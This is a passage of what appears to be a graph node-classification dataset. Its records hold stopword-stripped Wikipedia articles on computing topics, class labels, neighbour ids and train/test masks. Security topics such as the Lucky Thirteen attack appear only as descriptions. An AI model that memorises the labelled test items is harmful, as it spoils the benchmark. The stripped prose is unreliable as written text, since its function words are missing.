    "text": "Programming_language_theory:programming language theory programming language theory plt branch computer science deals design implementation analysis characterization classification programming languages individual features falls within discipline computer science depending affecting mathematics software engineering linguistics even cognitive science well-recognized branch computer science active research area results published numerous journals dedicated plt well general computer science engineering publications ways history programming language theory predates even development programming languages lambda calculus developed alonzo church stephen cole kleene 1930s considered world first programming language even though intended model computation rather means programmers describe algorithms computer system many modern functional programming languages described providing thin veneer lambda calculus many easily described terms first programming language invented plankalkül designed konrad zuse 1940s publicly known 1972 implemented 1998 first widely known successful high-level programming language fortran developed 1954 1957 team ibm researchers led john backus success fortran led formation committee scientists develop universal computer language result effort algol 58 separately john mccarthy mit developed lisp programming language based lambda calculus first language origins academia successful success initial efforts programming languages became active topic research 1960s beyond key events history programming language theory since several fields study either lie within programming language theory profound influence many considerable overlap addition plt makes use many branches mathematics including computability theory category theory set theory formal semantics formal specification behaviour computer programs programming languages three common approaches describe semantics meaning computer program denotational semantics operational semantics axiomatic semantics type theory study type systems tractable syntactic method proving absence certain program behaviors classifying phrases according kinds values compute many programming languages distinguished characteristics type systems program analysis general problem examining program determining key characteristics absence classes program errors program transformation process transforming program one form language another form comparative programming language analysis seeks classify programming languages different types based characteristics broad categories programming languages often known programming paradigms metaprogramming generation higher-order programs executed produce programs possibly different language subset original language result domain-specific languages languages constructed efficiently solve problems particular part domain compiler theory theory writing compilers generally translators programs translate program written one language another form actions compiler traditionally broken syntax analysis scanning parsing semantic analysis determining program optimization improving performance program indicated metric typically execution speed code generation generation output equivalent program target language often instruction set cpu runtime systems refers development programming language runtime environments components including virtual machines garbage collection foreign function interfaces conferences primary venue presenting research programming languages well known conferences include symposium principles programming languages popl programming language design implementation pldi international conference functional programming icfp international conference object oriented programming systems languages applications oopsla international conference architectural support programming languages operating systems asplos notable journals publish plt research include acm transactions programming languages systems toplas journal functional programming jfp journal functional logic programming higher-order symbolic computation",
    "neighbors": [
      5635,
      4612,
      10246,
      9224,
      3601,
      2619,
      2620,
      4670,
      8262,
      9804,
      2666,
      3698,
      9330,
      9345,
      8324,
      10909,
      4770,
      6306,
      10403,
      3767,
      6332,
      3263,
      4799,
      9926,
      9932,
      731,
      8926,
      7394,
      8421,
      2283,
      2798,
      9969,
      2294,
      5880,
      3323,
      5373,
      2304,
      2817,
      6406,
      11020,
      5399,
      3876,
      10532,
      1830,
      4392,
      5420,
      7983,
      10031,
      1333,
      9535,
      8000,
      10049,
      10568,
      5456,
      2901,
      3413,
      1890,
      10083,
      369,
      4980,
      3960,
      8057,
      10617,
      2438,
      6536,
      1936,
      6036,
      1947,
      6047,
      1952,
      2482,
      1976,
      8122,
      8644,
      1480,
      3529,
      5585,
      5081,
      2012,
      10729,
      11242,
      9710,
      9714,
      6652,
      2558,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 5586,
    "label": 4,
    "text": "Igor_Muttik:igor muttik igor muttik born 1962 russia computer security expert researcher inventor dr. igor muttik senior principal research architect mcafee part intel corporation since 2011 started researching computer malware 1980s anti-virus industry infancy muttik holds phd degree physics mathematics moscow state university member caro computer antivirus research organization since 1994 lives uk worked virus researcher dr. solomon ’ software since 1998 muttik running mcafee ’ anti-malware research emea switched architectural role 2002 2008 one co-founders amtso anti-malware testing standards organization board amtso 3 years muttik also co-founder industry connections security group icsg part ieee chair taggant system working group vice-chair icsg cmx clean file metadata exchange working groups taggant system cmx part amss anti-malware support service regular speaker major international security conferences like black hat briefings rsa conference def con virus bulletin eicar muttik visiting professor information security group royal holloway university london heading mcafee work security research mobile devices funded epsrc mobsec acid appguarden projects current work focused architecture security solutions smart devices hardware-assisted security technologies may 2009 muttik blog risks associated use software packers caused criticism rob rosenberger despite incident muttik working closely today several software companies developing software packers like themida taggant system",
    "neighbors": [
      704,
      2275,
      2213,
      11081,
      43,
      1451,
      3342,
      5902,
      5971,
      2425,
      7899
    ],
    "mask": "Test"
  },
  {
    "node_id": 5587,
    "label": 7,
    "text": "Okta_(identity_management):okta identity management okta inc. publicly traded identity access management company based san francisco provides cloud software helps companies manage secure user authentication modern applications developers build identity controls applications website web services devices founded 2009 initial public offering 2017 valued 6 billion okta sells six services including single sign-on solution allow users log variety systems using one centralized process example company claims ability log gmail workday salesforce slack one login also offers api authentication services okta services built top amazon web services cloud january 2019 okta ceo announced company 100 million registered users okta founded 2009 current okta ceo founder todd mckinnon previously served senior vice president engineering salesforce prior salesforce held various roles peoplesoft founders include okta coo frederic kerrest also previously salesforce 2015 company raised 75 million venture capital andreessen horowitz greylock partners sequoia capital valuation 1.2 billion previously raised 150 million across earlier funding rounds 2017 initial public offering raised additional 187 million. /ref traded first day time ipo sequoia capital biggest shareholder 21.2 percent stake company headquartered san francisco also offices san jose bellevue toronto washington d.c. london amsterdam sydney paris stockholm okta primarily targets enterprise businesses current customers include jetblue nordstrom mgm resorts international u.s. department justice runs annual “ oktane ” user conference recently featured former president barack obama keynote speaker",
    "neighbors": [
      101,
      10090,
      1935,
      7248,
      11646
    ],
    "mask": "Test"
  },
  {
    "node_id": 5588,
    "label": 9,
    "text": "Comparison_of_programming_languages_(array):comparison programming languages array comparison programming languages array compares features array data structures matrix processing 48 various computer programming languages following list contains syntax examples determine dimensions index first element last element size elements note particularly languages index zero others index one least since dijkstra famous essay zero-based indexing seen superior new languages tend use following list contains syntax examples access single element array following list contains syntax examples range element array accessed following table compiled languages ada fortran scripting languages idl matlab s-lang native support vectorized operations arrays example perform element element sum two arrays produce third necessary write addition support vectorized arithmetic relational operations languages also vectorize common mathematical functions sine example array result array whose elements sine corresponding elements array vectorized index operations also supported example one would use fortran create arrays even odd entries array another common use vectorized indices filtering operation consider clipping operation sine wave amplitudes larger 0.5 set 0.5 using s-lang done",
    "neighbors": [
      10752,
      515,
      2948,
      7684,
      3462,
      8582,
      1931,
      2062,
      6414,
      6160,
      5521,
      8082,
      9871,
      10510,
      3736,
      1435,
      155,
      7580,
      7326,
      9245,
      544,
      8225,
      8611,
      3876,
      5796,
      11555,
      4777,
      428,
      5165,
      5677,
      5806,
      9008,
      3765,
      8502,
      7479,
      10043,
      10684,
      6718,
      963,
      8644,
      8262,
      5703,
      5833,
      1610,
      1611,
      5961,
      3577,
      8397,
      847,
      8524,
      7889,
      9804,
      11212,
      3960,
      11219,
      7894,
      2519,
      4057,
      10586,
      11610,
      10083,
      4069,
      10470,
      7274,
      7147,
      8554,
      2670,
      7919,
      6640,
      10097,
      10739,
      6775,
      1016,
      3705,
      7292,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5589,
    "label": 4,
    "text": "Einstein_(US-CERT_program):einstein us-cert program einstein also known einstein program originally intrusion detection system monitors network gateways government departments agencies united states unauthorized traffic software developed united states computer emergency readiness team us-cert operational arm national cyber security division ncsd united states department homeland security dhs program originally developed provide situational awareness civilian agencies first version examined network traffic subsequent versions examined content current version einstein significantly advanced einstein product u.s. congressional presidential actions early 2000s including e-government act 2002 sought improve u.s. government services internet einstein mandate originated homeland security act federal information security management act 2002 homeland security presidential directive hspd 7 issued december 17 2003 federal computer incident response capability fedcirc one four watch centers protecting federal information technology e-government act 2002 designated primary incident response center fedcirc core us-cert formed 2003 partnership newly created dhs cert coordination center carnegie mellon university funded u.s. department defense us-cert delivered einstein meet statutory administrative requirements dhs help protect federal computer networks delivery essential government services einstein implemented determine government cyber attack einstein collecting flow data civilian agencies compared flow data baseline november 20 2007 accordance office management budget omb memo einstein version 2 required federal agencies except department defense united states intelligence community agencies executive branch einstein deployed 2004 2008 voluntary 2005 three federal agencies participated funding available six additional deployments december 2006 eight agencies participated einstein 2007 dhs adopting program department-wide 2008 einstein deployed fifteen nearly six hundred agencies departments web resources u.s. government created einstein automated process collecting correlating analyzing sharing computer security information across federal civilian government einstein protect network infrastructure private sector described 2004 purpose facilitate identifying responding cyber threats attacks improve network security increase resiliency critical electronically delivered government services enhance survivability internet einstein designed resolve six common security weaknesses collected federal agency reports identified omb report 2001 u.s. congress addition program addresses detection computer worms anomalies inbound outbound traffic configuration management well real-time trends analysis us-cert offers u.s. departments agencies health federal.gov domain einstein designed collect session data including us-cert may ask additional information order find cause anomalies einstein finds results us-cert analysis given agency disposition einstein 1 determined civilian agencies know ip space obviously security concern determined agency ip looked like immediately clear agency ip gateways could reasonably instrumented protected gave birth omb tic trusted internet connections initiative three constraints einstein dhs trying address large number access points u.s. agencies low number agencies participating program backward-looking architecture omb trusted internet connections initiative expected reduce government 4,300 access points 50 fewer june 2008 agencies reduced access points 60 requested target omb reset goal latter part 2009 number determined new version einstein planned collect network traffic flow data real time also analyze content communications looking malicious code example e-mail attachments expansion known one least nine measures protect federal networks new version called einstein 2 system automatically detect malicious network activity creating alerts triggered einstein 2 use minimal amount necessary predefined attack signatures come internal commercial public sources einstein 2 sensor monitors participating agency internet access point strictly ... limited trusted internet connections using commercial government-developed software einstein could enhanced create early warning system predict intrusions us-cert may share einstein 2 information federal executive agencies according written standard operating procedures summary form us-cert intelligence law enforcement mission notify provide contact information law enforcement intelligence agencies event occurs falls responsibility version 3.0 einstein discussed prevent attacks shoot ing attack hits target nsa moving forward begin program known “ einstein 3 ” monitor “ government computer traffic private sector sites. ” considered first private sector site program plan devised bush administration controversial given history nsa warrantless wiretapping scandal many dhs officials fear program move forward “ uncertainty whether private data shielded unauthorized scrutiny. ” believe program invade privacy individuals much privacy impact assessment pia einstein 2 published 2008 dhs gave general notice people use u.s. federal networks dhs assumes internet users expect privacy addresses email ip addresses websites visit service providers use information routing dhs also assumes people least basic understanding computers communicate know limits privacy rights choose access federal networks privacy act 1974 apply einstein 2 data system records generally contain personal information indexed queried names individual persons pia first version also available 2004 dhs seeking approval einstein 2 retention schedule flow records alerts specific network traffic related alert may maintained three years example case false alert data deemed unrelated potentially collected error deleted according dhs privacy assessment us-cert 24x7 incident handling response center 2007 us-cert data provided authorized users need know data business security purposes including security analysts system administrators certain dhs contractors incident data contact information never shared outside us-cert contact information analyzed secure data us-cert center began dhs certification accreditation process may 2006 expected complete first quarter fiscal year 2007 march 2007 center retention schedule approved national archives records administration disposition schedule —its records must considered permanent nothing may deleted april 2013 dhs still retention schedule working nppd records manager develop disposition schedules update issued may 2016",
    "neighbors": [
      7741,
      7322,
      7464,
      7337,
      939,
      10924,
      4081,
      6993,
      5780,
      2041,
      5402,
      5245,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 5590,
    "label": 4,
    "text": "Lucky_Thirteen_attack:lucky thirteen attack lucky thirteen attack cryptographic timing attack implementations transport layer security tls protocol use cbc mode operation first reported february 2013 developers nadhem j. alfardan kenny paterson information security group royal holloway university london novel variant serge vaudenay padding oracle attack previously thought fixed uses timing side-channel attack message authentication code mac check stage tls algorithm break algorithm way fixed previous attempts mitigate vaudenay attack sense attacks pose significant danger ordinary users tls current form however truism attacks get better time anticipate improvements attacks entirely new attacks may yet discovered — nadhem j. alfardan kenny paterson researchers examined free software implementations tls found examined products potentially vulnerable attack tested attacks successfully openssl gnutls researchers applied responsible disclosure worked software vendors software updates mitigate attacks available time publication martin r. albrecht paterson since demonstrated variant lucky thirteen attack amazon s2n tls implementation even though s2n includes countermeasures intended prevent timing attacks",
    "neighbors": [
      513,
      1157,
      517,
      1288,
      9744,
      1688,
      2083,
      3619,
      8358,
      11693,
      11569,
      9394,
      7736,
      9281,
      9412,
      3657,
      5834,
      10831,
      8273,
      11345,
      474,
      3805,
      7264,
      8674,
      7139,
      10341,
      5107,
      1526,
      2169,
      3707,
      510
    ],
    "mask": "Test"
  },
  {
    "node_id": 5591,
    "label": 4,
    "text": "Open_proxy:open proxy open proxy proxy server accessible internet user generally proxy server allows users within network group i.e closed proxy store forward internet services dns web pages reduce control bandwidth used group open proxy however user internet able use forwarding service anonymous open proxy useful seeking online anonymity privacy help users hide ip address web servers since server requests appear originate proxy server makes harder reveal identity thereby helps preserve perceived security browsing web using internet services real anonymity extensive internet security might achieved measure alone website operators use client-side scripts determine browser real ip address open proxy may keeping logs connections public vpns work open proxies possible computer run open proxy server without computer owner knowing result misconfiguration proxy software running computer infection malware viruses trojans worms designed purpose caused malware infected computer known zombie computer open proxies often implicated abuse number methods developed detect refuse service irc networks strict usage policies automatically test client systems known types open proxies likewise mail server may configured automatically test mail senders open proxies using software codice_1 groups irc electronic mail operators run dnsbls publishing lists ip addresses known open proxies ahbl cbl njabl till 2013 sorbs since 2002",
    "neighbors": [
      8224,
      7873,
      10756,
      3941,
      7739,
      2887,
      9256,
      5199,
      7515,
      2387,
      4725,
      119,
      761,
      827,
      2041,
      5887
    ],
    "mask": "None"
  },
  {
    "node_id": 5592,
    "label": 8,
    "text": "Libscore:libscore libscore web-based tool scans one-million popular websites collect statistics javascript library usage collects data jquery plugins javascript variables produced non-jquery plugins javascript libraries loaded via requirejs libscore provides tools intended help developers technical analysts compare relative popularity web frameworks third-party web tools libscore developed via co-sponsorship stripe payments processor digitalocean hosting infrastructure provider libscore founder julian shapiro created project 2014 web development grant awarded stripe major payments processing company developing libscore brokered partnership digitalocean participate project second final sponsor stripe provides legal resources covers cost libscore development digitalocean lends technical resources perform monthly crawling may 2015 libscore nominated net award competing 1,000 submissions june 2015 libscore 2.0 released introduced ability compare popularity libraries time also provided comparative graphing comparing library growth trends one another auto-suggest make library searching easier libscore scans top million sites web determine third-party javascript libraries installed site developers use data determine libraries trending popularity libraries use popular sites libraries market penetrations compare data helps developers perform competitive analysis make informed decisions choosing libraries work site libscore scans runs heuristics determine window variables produced third-party javascript libraries addition catalogues presence external javascript scripts thereafter via libscore homepage users search aggregated data order libscore also provides monthly statistics top libraries scripts sites addition regularly publishing charts showcasing library adoption percentages also libscore api provides developers programmatic access libscore monthly data",
    "neighbors": [
      10507,
      803,
      3462
    ],
    "mask": "None"
  },
  {
    "node_id": 5593,
    "label": 9,
    "text": "Mod_lisp:mod lisp mod_lisp extension module apache http server enables apache interface application servers written lisp making possible dynamically generate web pages provide web applications lisp programs unlike mod_* projects mod_perl mod_python mod_lisp embed lisp interpreter apache concept closer fastcgi handling requests serializing textual representation sending socket persistent lisp program sending lisp system response client client may web browser likely reverse proxy server server interacts user browser source freebsd style license lisp examples pre-compiled binaries freebsd linux win32 available mod_lisp web site",
    "neighbors": [
      1802,
      10506,
      9229,
      11154,
      1556,
      10020,
      10026,
      7212,
      10284,
      4658,
      2485,
      823,
      1468,
      4797,
      8644,
      11466,
      3920,
      5849,
      6366,
      865,
      6502,
      7784,
      9320,
      9834,
      8689,
      9841,
      124,
      9726
    ],
    "mask": "Test"
  },
  {
    "node_id": 5594,
    "label": 2,
    "text": "Windows_USER:windows user windows user component microsoft windows operating system provides core functionality building simple user interfaces component existed versions windows includes functionality window management message passing input processing standard controls windows user provides large part core user experience microsoft windows historically responsible gradually windows become larger better factored windows user cooperated components provide functionality windows user implements abstractions used build windows applications include hwnd basic unit visual display input windows developer platform visual elements either hwnds live part larger hwnd many functions windows user manipulate properties hwnds size position title hwnd also communication channel wndproc window procedure delivery messages windows managed tree desktop window root hierarchy child windows usually always visually contained within parents applications operating system communicate hwnds using messages window message combination target hwnd message code details mouse position combining calls windows user right way windows application processes messages core windows message loop including calls getmessage translatemessage dispatchmessage core windows application developer functionality related windows user provided c header file winuser.h 16-bit versions windows windows user implemented file called user.exe file extension misnomer windows user fact always dynamic link library 32-bit versions windows 32-bit version windows user called user32.dll located system32 directory compatibility 16-bit applications provided modified version user.exe also present 64-bit versions windows 64-bit implementation windows user called user32.dll located system32 directory modified 32-bit version also called user32.dll present syswow64 directory",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2603,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      9813,
      10839,
      603,
      9819,
      1632,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      3250,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      5029,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 5595,
    "label": 1,
    "text": "Single_source_of_truth:single source truth information systems design theory single source truth ssot practice structuring information models associated data schema every data element mastered edited one place possible linkages data element possibly areas relational schema even distant federated databases reference locations data refer back primary source truth location updates data element primary location propagate entire system without possibility duplicate value somewhere forgotten deployment ssot architecture becoming increasingly important enterprise settings incorrectly linked duplicate de-normalized data elements direct consequence intentional unintentional denormalization explicit data model pose risk retrieval outdated therefore incorrect information common example would electronic health record imperative accurately validate patient identity single referential repository serves ssot duplicate representations data within enterprise would implemented use pointers rather duplicate database tables rows cells ensures data updates elements authoritative location comprehensively distributed federated database constituencies larger overall enterprise architecture ssot systems provide data authentic relevant referable ideal implementation ssot described rarely possible enterprises many organisations multiple information systems needs access data relating entities e.g. customer often systems purchased off-the-shelf vendors modified non-trivial ways various systems therefore needs store version common data entities therefore system must retain copy record hence immediately violating ssot approach defined example erp enterprise resource planning system sap oracle e-business suite may store customer record crm customer relationship management system also needs copy customer record part warehouse dispatch system might also need copy customer data e.g. shipping address cases vendors support modifications always possible replace records pointers ssot organisations one information system wishing implement single source truth without modifying one master system store pointers systems entities three supporting technologies commonly used enterprise service bus esb allows number systems organisation receive updates data changed another system implement single source truth single source system correct data entity must identified changes entity creates updates deletes published via esb systems need retain copy data subscribe update update records accordingly given entity master source must identified sometimes called golden record given system could publish source truth information particular entity e.g. customer also subscribe updates another system information entity e.g. product alternative approach point-to-point data updates become exponentially expensive maintain number systems increases approach increasingly favour architecture mdm system act source truth given entity might necessarily alternative source truth another system typically mdm acts hub multiple systems many could allow source truth updates different aspects information given entity example crm system may source truth aspects customer updated call centre operator however customer may example also update address via customer service web site different back-end database crm system mdm application receives updates multiple sources acts broker determine updates regarded authoritative golden record syndicates updated data subscribing systems mdm application normally requires esb syndicate data multiple subscribing systems customer data integration cdi common application master data management sometimes abbreviated cdi-mdm 4554 primary purpose data warehouse support reporting analysis data combined multiple sources fact data combined according business logic embedded data transformation integration processes means data warehouse often used de facto ssot generally however data available data warehouse used update systems rather dw becomes single source truth reporting multiple stakeholders context data warehouse correctly referred single version truth since versions truth exist operational data sources data originates dw simply reporting mechanism data loaded operational systems software design schema business logic components often repeated multiple different contexts version refers source code address problem concepts ssot also applied software development principals using processes like recursive transcompiling iteratively turn single source truth many different kinds source code match structurally derived ssot",
    "neighbors": [
      11674,
      2851,
      3004
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5596,
    "label": 6,
    "text": "El_Torito_(CD-ROM_standard):el torito cd-rom standard el torito bootable cd specification extension iso 9660 cd-rom specification designed allow computer boot cd-rom announced november 1994 first issued january 1995 joint proposal ibm bios manufacturer phoenix technologies according el torito specification 32-bit cpu pc bios search boot code iso 9660 cd-rom standard allows booting two different modes either hard disk emulation boot information accessed directly cd media floppy emulation mode boot information stored image file floppy disk loaded cd behaves virtual floppy disk useful computers built 1999 designed boot floppy drive modern computers emulation mode generally reliable method bios assign bios drive number cd drive drive number int 13h assigned 80 hard disk emulation 00 floppy disk emulation arbitrary number bios provide emulation emulation allows older operating systems booted cd making appear booted hard floppy disk el torito also used produce cds boot linux operating systems including grub bootloader cd following multiboot specification el torito spec alludes mac platform id apple computers n't use according legend el torito cd/dvd extension iso 9660 gained name design originated el torito restaurant irvine california 33.684722 -117.852547 supported claim jack allweiss founder future domain inc. states future domain helped establish standard initial two authors curtis stevens phoenix technologies stan merkin ibm",
    "neighbors": [
      8075,
      6436,
      5413,
      7720,
      6062,
      7342,
      7983,
      8110,
      823,
      5816,
      6333,
      2811,
      4929,
      5062,
      10839,
      8676,
      11108,
      6118,
      1515,
      5231,
      3314,
      3323,
      1150
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5597,
    "label": 3,
    "text": "Web_interoperability:web interoperability web interoperability producing web pages viewable standard compatible web browsers various operating systems windows macintosh linux devices personal computers pcs pdas mobile phones tablets based latest web standards term originated web interoperability pledge promise adhere current html recommendations promulgated world wide web consortium w3c wip w3c initiative started run zdnet anchordesk quite independently issue known cross browsing browser war internet explorer netscape windows internet explorer dominant browser modern web browsers mozilla firefox opera safari supported web standards backward compatibility internet explorer many web pages supported non-standard html tags dom handling script yet well platform-dependent techniques activex harmful web accessibility device independence various activities example web standards project mozilla technology evangelism web standards group also educational activities web essential conference",
    "neighbors": [
      3462,
      8584,
      10026,
      6797,
      7983,
      3923,
      8854,
      823,
      124,
      1501
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5598,
    "label": 3,
    "text": "Address_space:address space computing address space defines range discrete addresses may correspond network host peripheral device disk sector memory cell logical physical entity software programs save retrieve stored data unit data must address individually located else program unable find manipulate data number address spaces available depend underlying address structure usually limited computer architecture used address spaces created combining enough uniquely identified qualifiers make address unambiguous within address space person physical address address space would combination locations neighborhood town city country elements address space may element address different addresses said space reference different entities example could multiple buildings address 32 main street different towns demonstrating different towns different although similarly arranged street address spaces address space usually provides allows partitioning several regions according mathematical structure case total order memory addresses simply chunks nested domain hierarchies appear case directed ordered tree domain name system directory structure similar hierarchical design postal addresses internet example internet assigned numbers authority iana allocates ranges ip addresses various registries order enable manage parts global internet address space uses addresses include limited following another common feature address spaces mappings translations often forming numerous layers usually means higher-level address must translated lower-level ones way example file system logical disk operates linear sector numbers translated absolute lba sector addresses simple cases via addition partition first sector address disk drive connected via parallel ata must converted logical cylinder-head-sector address due interface historical shortcomings converted back lba disk controller finally physical cylinder head sector numbers domain name system maps names network-specific addresses usually ip addresses turn may mapped link layer network addresses via address resolution protocol also network address translation may occur edge different ip spaces local area network internet iconic example virtual-to-physical address translation virtual memory different pages virtual address space map either page file main memory physical address space possible several numerically different virtual addresses refer one physical address hence physical byte ram also possible single virtual address maps zero one one physical address",
    "neighbors": [
      6664,
      6153,
      3603,
      7187,
      7195,
      3615,
      9762,
      7217,
      52,
      5176,
      1593,
      8762,
      10813,
      6719,
      2625,
      5188,
      7244,
      594,
      7269,
      5736,
      8301,
      9838,
      6772,
      3702,
      8831,
      3725,
      7323,
      682,
      2226,
      1219,
      9932,
      2253,
      5840,
      6868,
      1237,
      6358,
      1247,
      11489,
      9964,
      3315,
      5363,
      2813,
      1801,
      11539,
      10005,
      8474,
      10016,
      4385,
      2339,
      3370,
      4913,
      5437,
      6974,
      2887,
      5452,
      5457,
      8531,
      5469,
      11101,
      8545,
      6499,
      10603,
      11123,
      2422,
      10104,
      11130,
      11644,
      11645,
      394,
      7053,
      7057,
      7067,
      2980,
      7589,
      6570,
      9132,
      8625,
      11202,
      6087,
      5065,
      7631,
      4563,
      2015,
      10734,
      4592,
      6129,
      499
    ],
    "mask": "Test"
  },
  {
    "node_id": 5599,
    "label": 4,
    "text": "Commvault:commvault commvault publicly traded data protection information management software company headquartered tinton falls new jersey formed 1988 development group bell labs later became business unit network systems incorporated 1996 commvault software used data backup recovery cloud infrastructure management retention compliance commvault business split software licensing services march 1998 bob hammer al bunte joined commvault chairman president ceo vice president coo respectively feb. 5 2019 sanjay mirchandani replaced retiring hammer mirchandani joined commvault puppet oregon-based automation company resided ceo commvault software enterprise-level data platform contains modules back restore archive replicate search data built ground-up single platform unified code base data protected installing agent software physical virtual hosts use operating system application native apis protect data consistent state production data processed agent software client computers backed data manager mediaagent disk tape cloud storage data management activity environment tracked centralized server commserve managed administrators central user interface end users access protected data using web browsers mobile devices 2018 commvault began sell hyperscale backup appliance appliance commvault software pre-integrated hardware customers install directly data centers commvault provides consulting services customers commvault advises customers setting new data management systems architecture design implementation monitoring remote managed service commvault manages software production customers",
    "neighbors": [
      1560,
      11201,
      1358
    ],
    "mask": "Test"
  },
  {
    "node_id": 5600,
    "label": 2,
    "text": "Cairo_(operating_system):cairo operating system cairo code name project microsoft 1991 1996 charter build technologies next generation operating system would fulfill bill gates vision information fingertips cairo never shipped although portions technologies since appeared products cairo announced 1991 microsoft professional developers conference jim allchin demonstrated publicly including demo system attendees use 1993 cairo/win95 pdc microsoft changed stance cairo several times sometimes calling product times referring collection technologies cairo used distributed computing concepts make information available quickly seamlessly across worldwide network computers windows 95 user interface based initial design work done cairo user interface dce/rpc shipped windows nt 3.1 content indexing part internet information server windows desktop search remaining component object file system planned implemented form winfs part windows vista development cancelled june 2006 technologies merged microsoft products microsoft sql server 2008 also known codename katmai subsequently confirmed interview bill gates microsoft planned migrate applications like windows media player windows photo gallery microsoft office outlook etc use winfs data storage back-end",
    "neighbors": [
      636,
      641,
      8576,
      6787,
      3463,
      651,
      7307,
      6797,
      8080,
      3857,
      8976,
      10896,
      2196,
      3477,
      7317,
      11030,
      11283,
      4505,
      5406,
      10273,
      8098,
      4515,
      11301,
      3496,
      6441,
      6697,
      1581,
      7983,
      3250,
      3890,
      9910,
      6462,
      7615,
      321,
      7106,
      582,
      9033,
      1098,
      2380,
      6476,
      9166,
      10957,
      4305,
      4051,
      9173,
      11605,
      2391,
      3289,
      4316,
      8798,
      11103,
      10338,
      2919,
      8296,
      5225,
      4074,
      8299,
      8423,
      9194,
      9448,
      5103,
      10989,
      242,
      7796,
      6265,
      8315,
      1148,
      7806,
      639
    ],
    "mask": "Test"
  },
  {
    "node_id": 5601,
    "label": 5,
    "text": "LocalTalk-to-Ethernet_bridge:localtalk-to-ethernet bridge localtalk-to-ethernet bridge network bridge joins physical layer appletalk networking used previous generations apple computer products ethernet network important class products late 1980s early 1990s ethernet support became universal mac lineup localtalk-to-ethernet bridges performed appletalk bridging others also able bridge protocols using ad-hoc standards one example macip system allowed localtalk-based macs send receive tcp/ip internet packets using bridges go-between hardware devices software mactcp era 1995 software open transport era 1995",
    "neighbors": [
      5864,
      4345,
      7706
    ],
    "mask": "Train"
  },
  {
    "node_id": 5602,
    "label": 1,
    "text": "Independent_Safeguarding_Authority:independent safeguarding authority independent safeguarding authority isa non-departmental public body england northern ireland wales existed 1 december 2012 merged criminal records bureau crb form disclosure barring service dbs isa created labour government 2007-2010 tabloid media campaign decision set isa followed inquiry headed sir michael bichard set wake soham murders isa oversee new vetting barring scheme england wales northern ireland required working vulnerable groups undergo enhanced vetting procedure allowed commence relevant duties 15 june 2010 new coalition government home secretary theresa may announced plans new applicants jobs working children vulnerable along changing posts would register independent safeguarding authority halted vetting barring scheme would severely scaled back save uk taxpayer around £100 million year home secretary went say protection children vulnerable adults would focus upon common sense rather measures labour introduced said got actually trust people philosophy behind setting isa based upon assumption assumed guilty sense proven innocent told able work children review vetting barring scheme published 11 february 2011 made recommendations merger criminal records bureau independent safeguarding authority one non-departmental public body responsible barring individuals completing criminal record checks protection freedoms act new scheme require registration cases details retained database exception barred whether basis crime basis 'soft intelligence e.g dismissal employer led continued criticism variety organizations bichard report published 22 june 2004 made 31 recommendations recommendation 19 called new registration scheme stated new arrangements introduced requiring wish work children vulnerable adults registered register – perhaps supported card licence – would confirm known reason individual work client groups new register would administered central body would take decision subject published criteria approve refuse registration basis information made available police agencies responsibility judging relevance police intelligence deciding person ’ suitability would lie central body note recommendation use double-negative known reason individual work client groups say isa inception designed clear individuals suitable work vulnerable groups remove pose known risk proposals implement recommendations put public consultation 5 april 2005 results exercise announced rt hon ruth kelly secretary state department education skills 19 january 2006 translated primary legislation safeguarding vulnerable groups act 2006 received royal assent 8 november 2006 within act isa referred independent barring board known isa since august 2007 formally renamed following royal assent policing crime bill 2009 safeguarding vulnerable groups act covers england wales comparable legislation passed cover northern ireland scotland department children schools families known held consultations along creating isa safeguarding vulnerable groups act 2006 defines two categories work whether paid fall within scope act regulated controlled activity regulated activity primary area work covered act broadly deals direct contact vulnerable groups specifically regulated activity covers activity involves contact children vulnerable adults specified nature e.g teaching training care supervision advice treatment transport activity allowing contact children vulnerable adults specified place e.g school children ’ home etc. activity regulated activity must take place frequent intensive basis regulated activity also covers fostering childcare adoption child defined anyone 18 except employment settings age limit 16 addition number defined office holders position prescribed post-holder deemed engaging regulated activity irrespective actual contact vulnerable groups list includes people local authority director children ’ services trustees children ’ charities school governors distinction made paid voluntary work duties responsibilities regulated activity organisation providing activity although serious criminal offence engage regulated activity barred individuals engage regulated activity required register isa prominent example involved domestic employment individuals required register isa employed parents work children vulnerable adult arranges individuals provide care homes examples domestic employment would include groups private tutors employed directly parents individuals involved direct payments scheme policy confirmed government response isa scheme consultation document may 2008 controlled activity much limited area work tightly defined safeguarding vulnerable groups act controlled activity applies mandatory check isa registration status individuals controlled activity although possible employ barred person providing sufficient safeguards put place isa functioned decision-making element new vetting barring scheme application process monitoring functions run criminal records bureau largely retains functions 2012 entirely merged crb operational vetting barring scheme originally designed would required engaged regulated controlled activity register registration status checked would possible 'opt-out scheme would criminal offences non-compliance employer employee apply case barred individual seeks attains work successful original application process would provided unique reference number employers would verify potential employee membership allowing commence duties via free online check estimates time stated number would required register would approximately 11.3 million people quarter adult population criticised press 2009 proposal create intrusive database ever created democracy described later initial proposals withdrawn press hostility led government creation singleton review 2009 subsequent review led eileen munro 2010 cost registration originally set £64 per person except volunteers would free charge fees also withdrawn requirement register abandoned 2010 point isa barred list reshaped simply list barred accessible employers certain others akin predecessor 